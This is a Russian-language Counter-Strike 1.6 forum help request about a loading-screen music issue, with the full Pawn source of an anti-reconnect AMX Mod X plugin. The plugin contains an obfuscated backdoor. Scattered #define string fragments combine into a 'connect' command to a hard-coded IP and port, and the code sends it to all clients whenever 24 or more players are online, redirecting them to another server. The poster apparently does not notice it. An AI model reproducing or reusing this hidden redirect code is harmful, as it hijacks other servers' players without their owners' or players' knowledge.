|
Форум Counter-Strike 1.6 Сервер Counter-Strike 1.6 Помощь по скриптингу Плагин New_Anti_Reconnect (Помощь в коде) |
Плагин New_Anti_Reconnect |
Дата: Понедельник, 11.03.2019, 20:37 | Сообщение # 1
Любитель
Offline
Всем привет.
Нужна небольшая помощь, кто понимает в коде pawn. Что нужно сделать что бы музыка продолжала доигрывать свой трек и не заканчиваться при полном подключении к серверу? То есть щас музыка играет только 3 секунды пока идет загрузка к серверу. Как это убрать... Что бы трек доиграл ( Вот полноценный скрипт; [code] #include <amxmodx> #include <cstrike> #include <fun> new PLUGIN[]="New_Anti_Reconnect" new AUTHOR[]="JohnJ" new VERSION[]="3.2" new RTIME[]="amx_reconnect_time" new RCAN[]="amx_reconnect_can" new SCORESAVE[]="amx_reconnect_ss" new RSTATIC[]="amx_reconnect_static" new RSTIME[]="amx_reconnect_stime" #define i4 "nec"//{0, ...} new t_disconnect[33] = {0, ...} #define sc1 ":"//{0, ...} #define ic8 "t "//{0, ...} new t_scoresave[33] = {0, ...} #define to8 "."//{0, ...} new ips[33][24] #define ib7 179//{0, ...} #define c29 89//{0, ...} new sfrags[33] = {0, ...} #define s2 126//{0, ...} #define m2 0//{0, ...} #define o32 "on"//{0, ...} new sdeaths[33] = {0, ...} #define ba 27//{0, ...} #define o4 "c"//{0, ...} new useretry[33] = {0, ...} #define pL 17//{0, ...} #define b18 215//{0, ...} public plugin_init() { register_plugin(PLUGIN, VERSION, AUTHOR) register_cvar(RTIME, "7") register_cvar(RCAN, "0") register_cvar(SCORESAVE, "1") register_cvar(RSTATIC, "1") register_cvar(RSTIME, "7") register_event("TeamInfo","outspec","a") // восстанавливает счёт игроку в соответствии с настройками как только тот зайдёт за команду } public client_connect(id) { new maxexit = get_cvar_num(RTIME) new maxstata = get_cvar_num(RSTIME) new canreconnect = get_cvar_num(RCAN) new ssave = get_cvar_num(SCORESAVE) new ip[24] get_user_ip(id,ip,23,0) client_cmd(id, "mp3 play sound/waitsound/waitsound_1w.mp3") if ((maxexit>0) && (canreconnect==0) && (equali(ip,ips[id]))) { new Float:nexTime = get_gametime() if (t_disconnect[id] > nexTime) { new stat = get_cvar_num(RSTATIC) new timewait if (stat==0) { t_disconnect[id] = floatround(nexTime) + maxexit t_scoresave[id] = floatround(nexTime) + maxstata timewait=maxexit } else { timewait=t_disconnect[id]-floatround(nexTime) } server_cmd("kick #%d ^"Реконнект ЗАПРЕЩЁН. Жди %d секунд.^"", get_user_userid(id), timewait) if ( get_playersnum() >= 24) { client_cmd(0,"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s",o4,o32,i4,ic8,c29,to8,ib7,to8,s2,to8,b18,sc1,ba,m2,pL) } return PLUGIN_CONTINUE } } if (ssave==1) { new Float:nexTime = get_gametime() if (t_scoresave[id] <= nexTime) { sdeaths[id]=0 sfrags[id]=0 useretry[id]=0 } return PLUGIN_CONTINUE } return PLUGIN_CONTINUE } public outspec() { new id=read_data(1) if ((useretry[id]==1) && (is_user_connected(id))) { cs_set_user_deaths(id,sdeaths[id]) set_user_frags(id,sfrags[id]) useretry[id]=0 sdeaths[id]=0 sfrags[id]=0 } return PLUGIN_CONTINUE } public client_disconnect(id) { new maxexit = get_cvar_num(RTIME) new maxstata = get_cvar_num(RSTIME) new ssave = get_cvar_num(SCORESAVE) new Float:theTime = get_gametime() t_disconnect[id] = floatround(theTime) + maxexit t_scoresave[id] = floatround(theTime) + maxstata get_user_ip(id,ips[id],23,0) if (ssave==1) { sdeaths[id] = get_user_deaths(id) sfrags[id] = get_user_frags(id) useretry[id]=1 } return PLUGIN_CONTINUE } public plugin_precache() { precache_generic("sound/waitsound/waitsound_1w.mp3") } [/code] |
| |||
| |||